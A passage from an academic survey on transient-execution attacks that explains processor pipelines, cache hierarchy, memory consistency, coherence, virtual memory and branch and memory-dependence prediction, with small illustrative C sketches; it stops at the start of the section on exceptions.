
Transient-Execution Attacks: A Computer Architect Perspective

Published: 06 October 2023

Abstract

Computer architects employ a series of performance optimizations at the micro-architecture level. These optimizations are meant to be invisible to the programmer, but they are implicitly programmed alongside the architectural state. Critically, the incorrect results of these optimizations are not scrubbed from the micro-architectural state. This side-effect may seem innocuous. However, through transient execution, an attacker can leverage this knowledge to obtain information from the micro-architectural state and transmit the data back to itself. Transient-execution attacks are a class of attacks that use the side-effects of executed instructions to leak data. They are split into two categories: speculation-based (Spectre-type) and exception-based (Meltdown-type). A successful attack requires, first, access to the sensitive information and, second, a transmission channel through which the data can be recovered. Therefore, this survey explains how an attacker can use the state from optimizations in the micro-architecture to access sensitive information from other programs running on the same device; and, once the information is obtained, it describes how the data can be encoded and transmitted in the micro-architectural state. Moreover, it introduces a taxonomy and analyzes defenses for such malicious attacks.

1 Introduction

Micro-architectural attacks have been an extensively researched topic [17, 82, 109, 112, 115, 165]. Traditional micro-architectural attacks relied on exploiting code that, unbeknownst to the programmer, left remnants of information in the cache hierarchy [109, 180]. In turn, the attacker, aware of this fact, knows how to extract that information from the state in the cache hierarchy. In this sense, the victim was voluntarily offering that information, i.e., the victim was only vulnerable to micro-architectural attacks if they executed the required code sequences and updated their architectural state to reveal information. If the attacker sought to force a victim into executing certain code paths, the attacker had to gain control of the Program Counter (PC), traditionally through a memory vulnerability, and then execute Return Oriented Programming (ROP) [128] or Jump Oriented Programming (JOP) [19]. This all changed when transient-execution attacks were introduced. Transient-execution attacks showed that, even when the victim executes a code sequence that does not update the architectural state, that execution can still reveal sensitive data. After the victim’s execution, an attacker can read the victim’s data that is left in the micro-architectural state through side-effects of executed instructions.
Distinguishing between updates at the architectural and micro-architectural levels is key to understanding how transient-execution attacks differ from traditional micro-architectural attacks. Defining a computer architecture requires specifying an Instruction Set Architecture (ISA), which defines a set of instructions that enable the programmer to modify the architectural state. The architectural state is defined by the contents of the register file and the external memory. An implementation of the ISA guarantees the behavior of the provided instructions. A micro-architecture corresponds to a concrete implementation of an ISA. There are no restrictions on how the ISA is implemented. As such, the implementer can add extra micro-architectural state to achieve better performance. The micro-architectural state is a superset of the architectural state; the additional state is invisible to the programmer, as it is not defined by the ISA.
Transient-execution attacks leverage the fact that the micro-architectural state is shared between threads and that each thread modifies the shared state in a unique way. One can design programs that, through measurements such as memory access latency, infer how this shared state has been modified by other threads. In general, a transient-execution attack is split into two components: (1) a method to access a buffer or memory address in an execution path that will not update the architectural state, and (2) the encoding of the data from step (1) into the micro-architectural state such that the information can be recovered later. It is important to distinguish transient-execution attacks from side-channel attacks. Even though transient-execution attacks use side-channel attacks, their unique characteristic is that they rely on side-effects of executed instructions, which may or may not update the architectural state, to gain access to data and transmit it through a micro-architectural state that is shared between threads [81]. Transient-execution attacks are a recent field; as such, the community is actively researching methods and techniques to identify and mitigate attacks. Published proposals range from hardware-only [3, 12, 33, 172], to software-only [8, 11, 148], and in between [49, 88, 185].
The goal of this survey is to provide an overview of transient-execution attacks and corresponding defense mechanisms through the lens of computer architecture. The information provided herein is targeted at readers new to this field who aim to develop and design micro-architectural components that are protected against transient-execution attacks. Therefore, the descriptions and examples provided feature a generic micro-architectural model not tied to any particular ISA or micro-architecture. This is done for three main reasons: (1) tying explanations to a single micro-architecture narrows the understanding of where each attack or defense can be applied; (2) decoupling from a known ISA or micro-architecture allows the isolation of the primitives that are responsible for an attack/defense; (3) analyzing each attack/defense detached from an ISA or micro-architecture deepens the understanding of the threat model of the system. However, it must be noted that, due to the generic descriptions provided herein, some attacks will not work out-of-the-box. This occurs because most of the research in this field focuses on the x86 architecture and Intel’s micro-architectures. Nevertheless, it is the belief of the authors that the general descriptions provided can be of use as a starting point for research in attacks and defenses on different micro-architectures.
This survey explains the micro-architectural components that are traditionally exploited in transient-execution attacks (Section 2) and how the usage of speculation connects them (Section 3). Section 4 explains multiple methods on how data can be encoded and transmitted in the cache hierarchy under a speculation window. With that basis, the original transient-execution attacks (Spectre-BTB, Spectre-PHT, and Meltdown-US) are explained and how they have been enhanced (Section 5). Section 6 discusses and compares the different point-of-views used in state-of-the-art defense proposals, and Section 7 concludes the article. This survey makes the following contributions.
Provide a bottom-up introduction to transient-execution attacks. Starting with the primitives in modern micro-architectures, all the way up to the original transient-execution attacks. This survey explains, describes, and contextualizes the basic concepts and ideas thoroughly;
Present a point-of-view from a computer architecture perspective. The surveys in this area focus more on the practical aspects of the attacks, e.g., how to attack commodity systems or how fast an attack is triggered, instead of the micro-architectural primitives behind them and their impact on a generic architecture model [21, 23, 91];
Use a generic micro-architectural model to describe transient-execution attacks. The state-of-the-art tends to focus on x86 due to the market dominance it possesses;
Explain how speculation connects all components in the micro-architecture;
Give a detailed and thorough explanation of the cache hierarchy, and how data is encoded and transmitted in it;
Show a micro-architectural explanation of the original Spectre-PHT, Spectre-BTB, and Meltdown-US attacks, and how they have been enhanced upon;
Propose a taxonomy of the current state-of-the-art defenses for transient-execution attacks.

2 Background: Modern Computer Architectures

Modern computer architectures employ optimizations that transparently alter the expected behavior of the programming model. The expectation is that, given a sequence of instructions, they will be executed by the core one at a time in program-order. Traditional programming models define the architectural state with the contents of two levels of memory: a fast and small register file, and a slow and large external memory. It is the Operating System's (OS) responsibility to share the system's resources between different executing programs. Namely, the OS guarantees that one running program cannot modify the architectural state of another running program. The external memory is a shared resource between all currently executing processes, and is updated on every store. A load will always read from the most recent store to the same address. The micro-architecture may contain multiple cores to execute different programs or multiple instances of a program in parallel. The key concept in all optimizations is that they aim to “hide” the latency of a high-latency instruction while maintaining the expected programming model and architectural results. This section introduces the core background concepts for modern computer architectures and how they deviate from the expected behavior of the programming model.

2.1 Core Execution Architecture

From the programming model, it is expected that a program executes instructions and updates the architectural state in program-order. Each instruction only starts after the previous one has updated the architectural state. However, executing this program in this form constrains its performance as the latency of the program would be the sum of the latency of all instructions. The architecture of such a core is referred to as multi-cycle.
The architecture of the core is split into two components: the frontend and the backend. The frontend is tasked with fetching instructions from memory and feeding instructions to the backend. The backend is tasked with executing the instruction provided by the frontend and updating the architectural state. The backend can be further split into three steps: execute, write-back, and commit. The execute stage moves the instruction from the frontend to the backend and dispatches the instruction to functional units to be executed. The write-back stage stores the results of completed instructions from the execute stage. The commit stage applies the results of the completed instructions from the write-back stage to the architectural state.
To improve performance, the datapath of a core is split into multiple independent logical stages. At the end of each stage, there is a register such that the critical path of the core is shorter. Using this scheme, the core is a series of pipeline stages where each performs a small portion of the work required to apply the instruction to the architectural state. As a result, the latency of each instruction overlaps with the latency of other instructions already in the pipeline. Hence, the smallest latency of a program is achieved when all stages of a balanced pipeline are processing instructions in program-order concurrently.
A performance optimization often employed in a core is to execute independent instructions in parallel. In this instance, the ideal latency of a program would be equal to the latency of the instruction stream with the longest dependence chain. In general, any two or more streams of instructions that have no dependencies between them can be executed in parallel. Cores that can execute more than one instruction in parallel are referred to as superscalar. The more instructions that can be executed in parallel, the higher the performance of the core [52]. This metric is referred to as Instruction-Level Parallelism (ILP) and is a general performance guideline for a core [52]. Each instruction may complete execution, or write-back, Out-of-Order (OoO), i.e., in non-program-order. However, younger instructions in program-order cannot update the architectural state before older instructions, as that would break program-order and possibly dependence chains (write-after-write and write-after-read hazards) [30, 114]. Recall that the commit stage controls the order in which instructions are applied to the architectural state from the write-back stage. To maintain these properties, another structure, the Reorder Buffer (ROB), allows the core to commit instructions in program-order.
To further improve performance, instructions that have their dependencies and functional unit ready should be able to execute. Order is a non-factor as the ROB guarantees that the instructions are applied to the architectural state in-order. Therefore, the execute stage can be decoupled into two stages: issue and dispatch. The issue stage moves an instruction from the frontend to the backend. The dispatch stage moves an instruction from a backend buffer into a functional unit. A core is considered in-order when instructions are only issued to the execution backend and dispatched when all operands are available and there is no structural hazard [114]. A core is considered OoO when instructions are issued regardless of operand availability. The execution backend will then dispatch the instruction when all operands are available and there are no structural hazards [52]. In OoO cores, instructions can execute before older instructions in program-order. In in-order cores, instructions execute in program-order but may complete OoO. Using the different execution backends, transiently-executed instructions can be defined: instructions whose execution leaves measurable side-effects in the micro-architectural state even though they have not been, or never will be, committed to the architectural state.

2.2 Cache Hierarchy

Memory instructions (loads and stores) incur a large latency due to accessing a relatively slow external memory. A core would have to overlap the execution of multiple instructions to “hide” the latency of a memory access. This may not be possible due to dependencies, especially in in-order designs, and the core will stall, waiting for a memory response.
To reduce the latency of memory operations, multiple levels of cache are inserted between the core and the main memory. Caches increase their capacity and access time the closer to main memory they are. They are self-managed memories that attempt to predict what data will be reused in the near future and keep it in a cache. A cache is organized into sets containing one or more ways [114]. Each way contains one cache line, typically 64 bytes. When a set is fully occupied, a replacement policy selects which way will be evicted from the cache [114]. A cache access has three steps (Figure 1): ① hash the memory address to obtain a pointer to a set; ② compare the input address with the stored addresses in each way; ③ if there is an address match (hit), fetch the data from that way; else (miss), fetch the data from a higher-level memory/cache, possibly evicting one way from the set if it is fully occupied.
Fig. 1. Three-step operation of a cache.
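To make step ① concrete, the following minimal sketch splits a 32-bit address into the three fields used by the lookup. The field widths are assumptions, chosen to match the example cache parameters used later in Figure 8 (64 B lines, 512 sets); they are not prescribed by the article.

```c
#include <stdint.h>

/* Assumed field widths: 64 B lines (6 offset bits) and 512 sets (9 index
   bits), consistent with the example cache of Figure 8. */
#define OFFSET_BITS 6
#define INDEX_BITS  9

uint32_t line_offset(uint32_t addr) { return addr & ((1u << OFFSET_BITS) - 1); }
uint32_t set_index(uint32_t addr)   { return (addr >> OFFSET_BITS) & ((1u << INDEX_BITS) - 1); }
uint32_t tag(uint32_t addr)         { return addr >> (OFFSET_BITS + INDEX_BITS); }
```

The set index selects the set (step ①), and the tag is what is compared against the stored addresses in each way (step ②).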
In order to service the core with multiple memory requests, a cache needs to keep operating when one or more misses occur [52]. To do so, on a miss, the cache controller allocates a Miss Status Hold Register (MSHR) to handle the request asynchronously [84, 135, 161]. The MSHR will handle communication with higher-level memories to obtain the missing cache line, and deal with the eviction. There are two types of evictions, depending on whether the cache line has been modified by a store (dirty) or not (clean). An evicted dirty cache line needs to update the next higher-level memory, whereas a clean cache line can be silently dropped. When the missing cache line is returned, the MSHR inserts the new line in the cache and returns the data.
Using a cache hierarchy, most memory accesses are handled by the cache instead of the main memory. Therefore, the latency of memory accesses is shorter, which results in fewer stalls in the core. Since the cache handles most memory accesses, it needs to define when writes are applied to the next higher-level memory. There are two write policies available [75]:
Write-Back (write-allocate): a write first triggers a load of the address to the cache if it is not already cached, and then the write is performed. When the cache line is evicted, if its contents have been modified, it will be written to the next higher-level memory/cache;
Write-Through (write-no-allocate): a write is always written to the next higher-level memory regardless of its presence in the cache. If the address is also in the cache, then the write is also applied to the cache.
Therefore, missing loads will always allocate a way in the cache. Depending on the write policy used, missing stores may also allocate a way in the cache [75]. There are two allocation strategies: write-allocate and write-no-allocate. Write-Allocate allocates lines on write misses; Write-No-Allocate does not allocate lines on write misses. Logically, write-back is used with write-allocate, and write-through with write-no-allocate. However, it is theoretically possible to use any combination of allocation and write policies.
Common modern micro-architectures have two core private cache levels (L1 and L2), and a shared third level, Last Level Cache (LLC), among all cores (Figure 2). For multi-threaded programs that share data, one thread needs to access an address that is cached in another core’s private cache. The thread requesting the data is in one of two scenarios depending on whether the address was written to or not. If the data has not been updated, the requesting thread can fetch it from memory or the cache hierarchy. If the data has been updated, the updated value may only be available in the cache hierarchy.
Fig. 2. Memory hierarchy of modern computer architectures. Each core has a private L1 cache, split into data and instruction caches, a private L2, and a shared LLC.
To find and retrieve the requested data, the cache hierarchy must solve two problems: first, it must know if that address is currently cached; second, it must know which cache contains the data corresponding to the address. Since all requests traverse the hierarchy from lower levels to higher levels looking for the memory address, a higher-level cache can duplicate data and/or store location information. Therefore, in Figure 2, every cache level from the L2 upward defines an inclusion policy. There are three common inclusion policies: Inclusive, Non-Inclusive Non-Exclusive, and Exclusive.
Inclusive [14, 90]: the higher-level cache duplicates the data present in all lower-level caches. A missing load or store allocates a way with the same address in all cache levels. The allocations may trigger different address evictions from all cache levels. Evicting an address from a high-level cache that is cached in lower-level caches triggers an eviction of the same address in all lower-level caches (Example in Figure 3(a)). The inclusive policy has been used in Intel’s L2 caches, where the L2 contains the contents of the L1 data cache, and in Intel’s LLCs, where the LLC contains the contents of all lower-level caches [90]. AMD’s Zen L2 caches are also inclusive of the L1 data cache [39];
Non-Inclusive Non-Exclusive [71, 176]: the higher-level cache may or may not duplicate the data present in all lower-level caches. A missing load or store allocates a way with the same address in all cache levels. The allocations may trigger different address evictions from all cache levels. Evicting an address from a high-level cache that is present in lower-level caches does not trigger evictions of the same address in those lower-level caches (Example in Figure 3(b)). The non-inclusive non-exclusive policy has been used in Intel’s (Skylake-SP) and AMD’s (Zen 2 and Zen 3) LLCs [39, 176];
Exclusive [14]: the higher-level cache does not duplicate the data present in any lower-level cache. A missing load or store allocates a way with the same address only in the L1 cache. If the allocation in the L1 cache triggers an eviction, the evicted line will be allocated in the next higher-level cache. If the next higher-level cache triggers another eviction due to the previous allocation, the same process repeats until either an empty way is found or the external memory is reached. Evictions from higher-level caches do not trigger evictions in lower-level caches (Example in Figure 3(c)). The exclusive policy has been used in AMD’s Opteron L2 cache, where the L2 cache does not contain the contents of the L1 data cache [4].
Fig. 3. Eviction examples for the three inclusion policies: Inclusive, Non-Inclusive Non-Exclusive, and Exclusive.

2.3 Memory Consistency

In multi-threaded systems, multiple threads perform operations on shared memory. A memory consistency model indicates which outcomes are allowed and which are not. The outcomes allowed determine the type of optimizations a micro-architecture can employ when executing memory operations. Specifically, memory models define what kind of memory operation reorderings are allowed. Out-Of-Order designs benefit from reordering memory operations as it allows support for multiple in-flight memory operations in parallel, thus overlapping the latency of multiple memory operations, which improves performance.
There are three main memory consistency models: Sequential Consistency (SC) [85], Total Store Order (TSO) (x86 [10, 65, 110] and RVTSO [126]), and weak ordering (IBM POWER [94], ARM [12, 94], and RVWMO [126]). The three models are ordered from strongest to weakest. The strongest model (SC) does not allow any type of reordering between memory operations, i.e., memory operations are executed in program-order. TSO allows store-load reordering within the same thread. The weakest models allow any kind of reordering as long as dependencies are maintained.
In practice, and simplifying somewhat, the key difference between SC and its weaker counterparts is the addition of a store buffer [110, 153]. The store buffer holds committed stores that have not yet been applied to the memory hierarchy. Adding a store buffer to the micro-architecture is an important optimization, especially for in-order designs, as it allows the core to continue executing instructions before the store is applied to memory. Such a micro-architecture needs to check the store buffer before dispatching any load to the memory hierarchy. If there is an address match, the micro-architecture will fetch the data from the store buffer instead of the memory hierarchy. The order in which stores are drained from the store buffer to memory (write combining [10, 65] and silent stores [65]) and the order in which loads are dispatched to memory further separate TSO from weaker models. Memory order can be enforced using fence instructions regardless of the reordering performed by the micro-architecture. A fence instruction guarantees that every older memory instruction completes, and that every younger memory access does not start, before the fence itself completes. The same ordering enforcement is applied to Read-Modify-Write (RMW) instructions.
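The effect of the store buffer can be observed with the classic store-buffering litmus test, sketched below as an illustrative example (it is not taken from the article). Under SC, the outcome r1 == 0 && r2 == 0 is impossible; on a TSO machine, each load can bypass the other thread's store while that store still sits in the store buffer, so the outcome occasionally appears. Inserting a full fence between the store and the load forbids it again.

```c
#include <pthread.h>
#include <stdatomic.h>
#include <stdio.h>

/* Store-buffering litmus test (illustrative sketch). */
atomic_int X, Y;
int r1, r2;

void *t1(void *arg) {
    (void)arg;
    atomic_store_explicit(&X, 1, memory_order_relaxed);
    /* atomic_thread_fence(memory_order_seq_cst);  a fence here forbids (0, 0) */
    r1 = atomic_load_explicit(&Y, memory_order_relaxed);
    return NULL;
}

void *t2(void *arg) {
    (void)arg;
    atomic_store_explicit(&Y, 1, memory_order_relaxed);
    r2 = atomic_load_explicit(&X, memory_order_relaxed);
    return NULL;
}

int main(void) {
    for (int i = 0; i < 100000; i++) {
        atomic_store(&X, 0);
        atomic_store(&Y, 0);
        pthread_t a, b;
        pthread_create(&a, NULL, t1, NULL);
        pthread_create(&b, NULL, t2, NULL);
        pthread_join(a, NULL);
        pthread_join(b, NULL);
        if (r1 == 0 && r2 == 0)  /* store-load reordering observed */
            printf("reordered at iteration %d\n", i);
    }
    return 0;
}
```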

2.4 Cache Coherence

Cache coherence is tasked with achieving a shared global state between all caches in a hierarchy. Since only stores modify memory, coherence protocols can be defined by how and when stores are performed in the cache hierarchy. A coherence protocol serializes all stores to a cached address and ensures that all caches in the hierarchy see the stores in the same order [106]. Therefore, the definition of the coherence scheme hinges on “propagating stores” to other caches. The cache coherence protocol defines two mechanisms in order to achieve this: how the stores are propagated and when they are propagated.
Propagating a store is performed by sending invalidation or update requests. An invalidation request invalidates the cache line at other caches. A thread's access to a line invalidated by coherence results in a coherence miss in the cache. On a coherence miss, the cache will issue a request to access the latest value of the address from another cache. An update request updates the cache line at other caches with the data from the store that created the request. In this case, there are no coherence misses as the caches are always kept up to date. Industry implementations favor invalidation requests as they require fewer physical resources to transmit the requests.
Memory consistency models have requirements for store atomicity that the cache coherence implementation must enforce [12, 65, 126, 183]. Either the store completes after being propagated to all caches simultaneously (atomic), or the store completes after being applied to the local L1 cache regardless of the propagation status to other caches (non-atomic).
There have been multiple proposals for coherence protocols with different tradeoffs; they are mostly atomic and invalidation-based: MSI, MESI, MOSI, MOESI, and MESIF [2, 38, 95]. The simplest protocol is the MSI protocol. Each cache line keeps metadata on its coherence state. The properties of each state are: the Modified state allows writes and reads to be performed on the cache line and guarantees that all other copies of the same cache line are invalidated; the Shared state allows reads to be performed, and other copies must be in the Shared or Invalid state; and the Invalid state does not allow reads or writes, while other copies of the same cache line may exist in the Shared or Modified state. Changing the coherence state of a cache line causes other copies of the same cache line to change state as well. For example, when a core requests a cache line in M state, regardless of the initial state, all other copies of the same cache line will be invalidated. When a core requests a cache line in S state, any other copy of the same cache line that is in M state will change to S, and any copy in I state remains unchanged. Figure 4 shows all these state transitions for the MSI protocol.
Fig. 4. State changes for a cached line using the Modified-Shared-Invalid coherence protocol. R = read; RW = read and write.
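The transitions of Figure 4 can be summarized in a few lines of C. The split into local and remote (snooped) events below is an assumption of this sketch; real protocols also track transient states and data transfers.

```c
/* Minimal MSI state machine sketch; event names are illustrative. */
typedef enum { I, S, M } msi_state_t;

/* The local core reads or writes its own copy of the line. */
msi_state_t on_local_access(msi_state_t st, int is_write) {
    if (is_write) return M;     /* a write requests M; other copies are invalidated */
    return (st == I) ? S : st;  /* a read upgrades I to S; S and M remain readable */
}

/* A request from another core is observed for the same line. */
msi_state_t on_remote_request(msi_state_t st, int is_write) {
    if (is_write) return I;     /* a remote M request invalidates our copy */
    return (st == M) ? S : st;  /* a remote read downgrades M to S */
}
```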

2.5 Virtual Memory and Process Isolation

Virtual memory splits physical memory into different virtual memory spaces, where each space is unique to a process. The virtual space contains the set of physical memory regions that are accessible to the process. This is achieved by providing a translation layer between the process’ addresses (virtual) and the actual memory addresses (physical). To achieve this kind of translation, memory is split into pages that may have different granularities, the minimum typically being 4 KiB [10, 58, 127]. On a memory access, translating an address involves traversing a tree of pages (page table walk). The path taken in the tree is given by the virtual address (Figure 5(a)). Each page contains, in Page Table Entries (PTEs), either pointers to the next step in the translation mechanism or the final translation. The page table walk requires multiple accesses to memory to visit the pages in the various translation levels, which is a high-latency procedure. To avoid traversing the tree every time a memory access is performed, the micro-architecture keeps a cache hierarchy of recently used translations, the Translation Lookaside Buffer (TLB) [114]. Figure 5 shows an example virtual memory system with 32-bit virtual addresses, 4 KiB pages, and 4 B PTEs, where a translation is performed (Figure 5(a)) using the PTEs shown in Figure 5(b).
Fig. 5. Virtual memory system example for a system with 32-bit addresses, 4KiB pages, and 4B PTEs.
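A sketch of the two-level walk implied by Figure 5's parameters follows: with 32-bit virtual addresses, 4 KiB pages, and 4 B PTEs, each page holds 1024 PTEs, so each level resolves 10 bits. The accessor phys_read32, the fault helper, and the PTE layout are assumptions made for illustration.

```c
#include <stdint.h>

#define PTE_VALID 0x1u

/* Assumed helpers; not part of the article. */
extern uint32_t phys_read32(uint32_t paddr);
extern uint32_t raise_page_fault(void);

/* Two-level page table walk: 10 + 10 index bits, 12 offset bits. */
uint32_t translate(uint32_t root_page, uint32_t vaddr) {
    uint32_t l1  = (vaddr >> 22) & 0x3ffu;  /* bits 31:22 index the root page */
    uint32_t l2  = (vaddr >> 12) & 0x3ffu;  /* bits 21:12 index the leaf page */
    uint32_t off =  vaddr        & 0xfffu;  /* bits 11:0 are the page offset */

    uint32_t pte1 = phys_read32(root_page + l1 * 4);
    if (!(pte1 & PTE_VALID)) return raise_page_fault();
    uint32_t pte2 = phys_read32((pte1 & ~0xfffu) + l2 * 4);
    if (!(pte2 & PTE_VALID)) return raise_page_fault();
    return (pte2 & ~0xfffu) | off;          /* physical frame plus offset */
}
```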
Modern commodity operating systems implement process isolation through separate virtual memory spaces for each process. Each page contains metadata on the type of memory accesses allowed (typically read, write, or execute) and the privilege levels (typically user or supervisor) required to perform them. A virtual memory space is private and unique to each process. Attempting to access a non-mapped address, an address that resides in a page with a higher privilege level, or a page that does not support the requested access type will result in an exception which, when handled by the OS, typically results in process termination.

3 Speculation

The process of speculation involves a prediction over a set of outcomes and a subsequent verification. For example, when the progress of a program depends on the outcome of a high-latency instruction, speculation can be used to predict the outcome of the instruction before its result is available, allowing execution to continue speculatively. A correct prediction avoids the core having to stall for the result before proceeding. However, if the verification concludes that a misprediction occurred, the core will have to roll back and restart from the state immediately before the instruction that triggered the prediction.
The fundamental idea behind speculation is that, prior to verifying the prediction, any effects generated by the instructions executed under the prediction are not visible in the architectural state. Otherwise, the program would generate incorrect results. However, as this section shows, certain portions of the micro-architectural state can be programmed implicitly. Specifically, instruction types that speculate are programming the micro-architectural state. It is from this implicit programming of micro-architectural state that speculation introduces security flaws. Speculation is employed in many areas of the core. Herein, three areas are discussed: instruction stream, memory dependencies, and exceptions.

3.1 Instruction Stream

In the Von Neumann model of operation, the PC is a register that holds a memory pointer to the next instruction to be executed. Every instruction in the ISA updates the PC, but two types of instructions update it in different ways. Non-control instructions select the next instruction to be executed implicitly, e.g., \(PC \leftarrow PC + n\), with n being the number of bytes that encode the instruction. Control instructions, or jumps, however, can write any value to the PC, e.g., \(PC \leftarrow x\). Within control instructions, there are two types of jump instructions: unconditional and conditional. Conditional control instructions are predicated instructions: a condition needs to be verified for the jump behavior to be defined. Unconditional control instructions always force the value of the PC. Moreover, a control instruction may calculate the resulting PC differently. Direct jumps use data that is encoded in the instruction to reach the target address, whereas indirect jumps use data that resides in the architectural state (register or memory).
To know which instruction should be fetched and executed, the core must first decode the current instruction to determine whether it is a control instruction. If the decoded instruction is a control instruction, it has to be executed to obtain the target address and, in the case of a conditional jump, to verify its predicate. Any core that fetches instructions before decoding all current instructions or executing all previous control instructions is speculating over the value of the PC. Direct jumps know their target addresses early in the pipeline (usually, at the decode stage), while indirect jumps do not. Indirect jumps need to execute to obtain the target address of the jump. Furthermore, if any of these jumps are conditional, the jump can only be performed after the condition is verified. Deciding the target of the jump and whether the jump is taken/not-taken is a high-latency operation. Therefore, to have a high instruction throughput, the core needs to fetch the correct instruction stream ahead of time.
Since the results of the jumps vary per instruction type, modern cores employ different prediction systems [96, 140, 143]. Conditional direct jumps have their target address available early in the pipeline, thus it is best to predict over the outcome of the predicate. Indirect jumps only compute their target address on execution. If the indirect jump is also conditional, the result of the predicate will also only be available on execute. Thus, indirect jumps need to predict over the target, and, if they are conditional, the result of the predicate. Note that, micro-architectures with a high decode latency do not differentiate between direct and indirect jumps [43, 129]. In these instances, they will always perform a prediction on both the target address and the predicate. Two structures can be used to predict over the instruction stream:
(1) Branch Target Buffer (BTB): each entry stores the target address and a tag to match with the current jump address. Its construction is exactly like a cache. There may be multiple levels of BTBs;
(2) Pattern History Table (PHT): each entry stores a prediction state indicating whether the target address should be written to the PC (taken jump) or not (not-taken jump). The state indicates the confidence of the prediction and its decision. Traditional implementations use a saturating counter [37, 113, 139], whereas more recent implementations use a neural network [72, 73]. If the prediction has low confidence or the prediction is not-taken, the next instruction is fetched from the subsequent address.
The method used to perform the predictions can be further split into two categories depending on what information is used to perform the prediction. A local predictor uses the current value of the PC and the history of this jump to perform the prediction. A global predictor uses information from previous jumps and the current value of the PC. To obtain this information, a new buffer is added, the Branch History Register (BHR), which is composed of the concatenated outcomes of the previous m jumps. The BHR acts as an m-bit shift-register [51]. The outcome of a jump is shifted into the BHR when the instruction is committed. A local predictor has a table that stores multiple BHRs indexed by the memory address of the jump. The selected BHR indexes the PHT. A global predictor shares the same BHR for all jumps. There are multiple constructions on how the PHT can be indexed. The two most popular are: the XOR of the BHR and the memory address of the jump (Gshare) [96], and a concatenation of the jump memory address and the BHR (Gselect) [113]. Besides the constructions described herein, others have also been adopted [181]. Regardless of the predictor used, the instruction fetch uses the output of the prediction unit and decides whether to take the target address from the BTB or not. Figure 6 shows an example of local and global predictors with 4-bit BHRs and a 1-bit prediction state. In the literature, the number of bits in the BHR is referred to as m and the number of bits in the prediction state as n [181]. Predictors are often referred to by their (m, n) combination. The examples in Figure 6 are (4, 1) predictors.
Fig. 6. Examples for (4, 1) local and global predictors, and a tournament predictor.
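As an illustration, a minimal sketch of a (4, 1) Gshare predictor follows. The PC shift amount and table size are assumptions of this sketch; the commit-time update follows the text above.

```c
#include <stdint.h>

#define M 4                            /* BHR bits (history length) */
static uint8_t bhr;                    /* global m-bit shift register */
static uint8_t pht[1 << M];            /* n = 1: one prediction bit per entry */

static uint8_t pht_index(uint32_t pc) {
    return (bhr ^ (uint8_t)(pc >> 2)) & ((1u << M) - 1); /* Gshare: BHR XOR jump address */
}

int predict(uint32_t pc) {             /* 1 = taken, 0 = not-taken */
    return pht[pht_index(pc)];
}

void update(uint32_t pc, int taken) {  /* applied at commit, as the text describes */
    pht[pht_index(pc)] = (uint8_t)taken;                      /* 1-bit state: last outcome */
    bhr = (uint8_t)(((bhr << 1) | (taken & 1)) & ((1u << M) - 1)); /* shift the outcome in */
}
```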
Micro-Architectures that deploy both local and global prediction systems have to decide which prediction result will be used. To decide, another predictor is added on top of the local and global predictors. A predictor that decides which predictor (local or global) will be used is called a metapredictor [96]. The metapredictor is similar to a PHT. The prediction result of the chosen predictor is compared with the result of the jump and the result of the metaprediction is updated. Similarly, the metapredictor can use a saturating counter or a neural network. Prediction systems that make multiple predictors compete for a result are called tournament predictors [76, 96]. Using all of these primitives, a prediction system can be built with multiple types of predictions with multiple levels of predictors all competing with each other. Figure 6(a) shows a tournament predictor example.
Each jump type programs the BTB, PHT, and BHR differently. The modifications are always applied on commit regardless of verification success. The BHR is updated with the result of the jump by shifting in the outcome: 0 as not-taken and 1 as taken. There are two kinds of mispredictions: mispredicting on a decision (taken/not-taken), or on a target. On a target misprediction, the target address is updated. On a decision misprediction, the confidence will increase or decrease based on the outcome of the predicate. The metapredictor is updated depending on the verification success of the prediction made. If the metapredictor used the correct predictor, the confidence will increase toward the predictor used; otherwise, the confidence will increase toward the other predictor.
The Return Address Stack (RAS)/Return Stack Buffer (RSB) is an indirect jump predictor that stores memory pointers to function callers in order to speed up function returns [145]. The stack buffer operates through push and pop operations. Whenever a function is called, the pointer to the instruction after the jump is pushed onto the stack. When the same function returns to the caller, the micro-architecture pops the stack and jumps to the address that was previously pushed. The speculation in this mechanism occurs when a call or return is detected. A mis-speculation occurs when the popped address does not match the target address of the return.
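A minimal circular RAS sketch is shown below; the 16-entry depth and the silent-overwrite-on-overflow behavior are illustrative assumptions, not details from the article.

```c
#include <stdint.h>

#define RAS_DEPTH 16
static uint32_t ras[RAS_DEPTH];
static unsigned top;                 /* next free slot; wraps around */

void on_call(uint32_t return_pc) {   /* push the address after the call */
    ras[top % RAS_DEPTH] = return_pc;
    top++;
}

uint32_t predict_return(void) {      /* pop: the predicted target of the return */
    top--;
    return ras[top % RAS_DEPTH];     /* mis-speculation if this differs from
                                        the actual return target */
}
```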

3.2 Memory Dependence

The memory addresses accessed by instructions are computed at runtime. Therefore, there are scenarios where memory operations cannot be dispatched to memory because the address has a long dependence chain or depends on a high-latency instruction. This scenario may cause a younger memory operation to be dispatched prior to an older memory instruction, where both operate over the same address. This results in a memory order violation and will trigger a rollback, which impacts the performance of the core [27, 99]. Memory dependence predictors, or address disambiguation units, aim to avoid memory order violations by predicting the dependencies of multiple memory instructions. Specifically, they look to match up loads and stores, and forward the results of stores to loads. The latter is an important optimization as it reduces the number of cache accesses in the core and the load’s latency. The predictor is successful when it correctly allows the OoO execution of multiple memory instructions that do not share the same address, and stalls a load that will operate over the same address as a previous store [27, 99].
A naive prediction structure in an OoO core is to dispatch all memory operations to the cache hierarchy as soon as their operands are available, i.e., the core predicts there are never any dependencies between memory operations [27, 99]. In this scheme, the Load Store Unit (LSU)/Load Store Queue (LSQ) keeps two queues, one for all in-flight loads and another for all in-flight stores. When stores are issued, they check these buffers. A store checks the load queue for any younger in-flight load to the same address. If there is a match, the core rolls back to the matching load and forwards the result of the store to it. Loads also check the load queue for younger in-flight loads to the same address. This is done because some memory models do not allow loads to be reordered with each other even if there is no intermediate store (more details can be found in [106]). If the memory model disallows this type of reordering and there is a match, the core rolls back to the matching load.
An improvement over this prediction structure is to store the memory addresses for every set of mis-predicted memory instructions. Specifically, store the links between stores and their dependent loads, and between loads and their dependent loads [27, 99, 138, 146]. The predictor is programmed using the virtual address and partial information from the physical address [27, 66, 70, 100, 101, 146]. The prediction is verified when the address of a memory operation is computed: the computed address is compared with the predicted address. If the addresses differ, a rollback is triggered [36, 70, 100].

3.3 Exceptions

